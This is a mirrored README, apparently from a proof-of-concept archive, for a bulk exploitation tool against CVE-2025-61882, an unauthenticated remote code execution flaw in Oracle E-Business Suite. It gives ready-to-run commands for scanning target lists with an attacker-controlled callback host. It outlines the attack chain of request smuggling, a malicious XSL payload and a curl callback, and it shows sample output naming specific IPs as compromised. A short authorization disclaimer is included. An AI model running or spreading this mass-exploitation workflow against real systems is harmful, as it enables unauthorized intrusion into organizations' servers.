来源

关联漏洞

描述

Exploit for CVE-2025-61882 (do not use without any written permission). 

介绍

# Oracle E-Business Suite RCE Scanner (CVE-2025-61882)

A fast, multi-threaded bulk scanner for detecting CVE-2025-61882 in Oracle E-Business Suite installations. This critical vulnerability allows unauthenticated remote code execution.

![Python Version](https://img.shields.io/badge/python-3.7+-blue.svg)
![License](https://img.shields.io/badge/license-MIT-green.svg)
![CVE](https://img.shields.io/badge/CVE-2025--61882-red.svg)

## 🎯 Features

- **Bulk Scanning** - Process hundreds or thousands of targets from a file
- **Multi-threaded** - Configurable concurrent scanning (default: 20 threads)
- **Automatic Detection** - Validates RCE by executing `id` command and parsing output
- **Real-time Results** - Vulnerable targets are written to `vuln-output.txt` immediately
- **Random Ports** - Uses random ports (2000-9999) for each target to avoid conflicts
- **Clean Output** - Progress tracking with minimal noise

## 📋 Requirements

```bash
pip install requests
```

That's it. Just Python 3.7+ and the `requests` library.

## 🚀 Installation

```bash
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
```

## 💻 Usage

### Basic Scan

```bash
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP
```

### Fast Scan (50 threads)

```bash
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50
```

### Conservative Scan (10 threads)

```bash
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10
```

## 📝 Target File Format

Create a `targets.txt` file with one URL per line:

```
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
```

## 📊 Output Example

```
╔═══════════════════════════════════════════════════════════════╗
║   Oracle E-Business Suite RCE Scanner (CVE-2025-61882)       ║
╚═══════════════════════════════════════════════════════════════╝

[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt

[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882

[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================

[+] Vulnerable targets found:

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)
```

## 📄 Output File

Results are saved to `vuln-output.txt`:

```
# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
```

## 🔍 How It Works

1. **CSRF Token Retrieval** - Fetches a valid CSRF token from the target
2. **HTTP Request Smuggling** - Exploits the smuggling vulnerability to inject malicious payload
3. **XSL Payload Delivery** - Serves malicious XSL stylesheet that executes commands
4. **Callback Validation** - Target executes `id` command and sends output back via curl
5. **Regex Matching** - Validates successful RCE by checking for `uid=...gid=...` pattern

## ⚙️ Configuration

| Argument | Required | Default | Description |
|----------|----------|---------|-------------|
| `--targets` | Yes | - | Path to file containing target URLs |
| `--lhost` | Yes | - | Your VPS/attacker IP address |
| `--threads` | No | 20 | Number of concurrent threads |

## 🔒 Responsible Disclosure

This tool is for **authorized security testing only**. Always:

- ✅ Get written permission before testing
- ✅ Only scan systems you own or have explicit authorization to test
- ✅ Report findings responsibly to affected organizations
- ✅ Follow coordinated vulnerability disclosure practices
- ❌ Never use this on unauthorized systems

**Unauthorized access to computer systems is illegal.**

## 🐛 Known Issues

- Some targets may timeout due to firewall/IDS blocking
- Callback detection requires target to reach your VPS on random ports
- SSL certificate warnings are suppressed (expected for pentesting)

## 🤝 Contributing

Found a bug? Have a feature request? 

1. Fork the repo
2. Create your feature branch (`git checkout -b feature/amazing-feature`)
3. Commit your changes (`git commit -m 'Add some feature'`)
4. Push to the branch (`git push origin feature/amazing-feature`)
5. Open a Pull Request

## 📜 License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## ⚠️ Disclaimer

This tool is provided for educational and authorized security testing purposes only. The author is not responsible for any misuse or damage caused by this tool. Use at your own risk.

## 📚 References

- [CVE-2025-61882 Details](https://nvd.nist.gov/vuln/detail/CVE-2025-61882)
- [Oracle Critical Patch Update](https://www.oracle.com/security-alerts/)

---

<div align="center">

### 👨‍💻 Developed by [Chirag Artani](https://3rag.com)

**[Website](https://3rag.com)** • **[Twitter](https://twitter.com/chiragartani)** • **[LinkedIn](https://linkedin.com/in/chiragartani)**

Made with ❤️ for the infosec community

</div>

文件快照

 [4.0K]  /data/pocs/5c998a28ef879d29246eab5f69a07358b752b573
├── [9.5K]  cve-2025-61882.py
├── [6.2K]  readmd
└── [5.8K]  README.md

0 directories, 3 files

备注